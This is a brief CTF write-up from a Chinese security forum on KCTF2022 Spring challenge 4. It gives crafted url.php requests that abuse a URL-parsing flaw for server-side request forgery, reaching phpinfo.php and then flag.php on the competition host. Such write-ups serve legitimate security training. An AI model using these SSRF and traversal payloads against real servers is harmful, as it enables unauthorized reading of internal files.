[原创]KCTF2022春第四题飞蛾扑火 writeup-CTF对抗-看雪-安全社区|安全招聘|kanxue.com

[原创]KCTF2022春第四题飞蛾扑火 writeup

2022-5-15 17:08 2547

[原创]KCTF2022春第四题飞蛾扑火 writeup

Wblank

2022-5-15 17:08

2547

访问 http://101.89.140.207:8044/

<html>
<head>
<meta charset="utf-8">
<title>欢迎挑战 Design by 香草</title>
</head>
<body>
<!--phpinfo.php-->
<img src="url.php?url=https://ctf.pediy.com/upload/team/762/team236762.png">
</body>
</html>

先把url.php重定向过了,做到ssrf

1	`http://101.89.140.207:8044/url.php?url=127.0.0.1://ctf.pediy.com/../phpinfo.php`

图片描述
看到curl下支持的协议存在file

http://101.89.140.207:8044/url.php?url=123.57.254.42://localhost/../flag.php
图片描述

[CTF入门培训]顶尖高校博士及硕士团队亲授《30小时教你玩转CTF》，视频+靶场+题目！助力进入CTF世界

收藏・0

点赞・0

打赏

最新回复 (0)
	游客登录 \| 注册方可回帖　回帖　表情雪币赚取及消费高级回复

Wblank

发帖

回帖

383

RANK

关注

私信

他的文章

[原创]KCTF2022春第四题飞蛾扑火 writeup

[原创]KCTF2022春第三题石像病毒 writeup

[原创]KCTF2022春第二题末日邀请 writeup

KCTF2021-秋第七题声名远扬 writeup

[原创]KCTF2021-秋第二题迷失丛林 writeup

关于我们

联系我们

企业服务

看雪公众号

[原创]KCTF2022春 第四题 飞蛾扑火 writeup

[原创]KCTF2022春第四题飞蛾扑火 writeup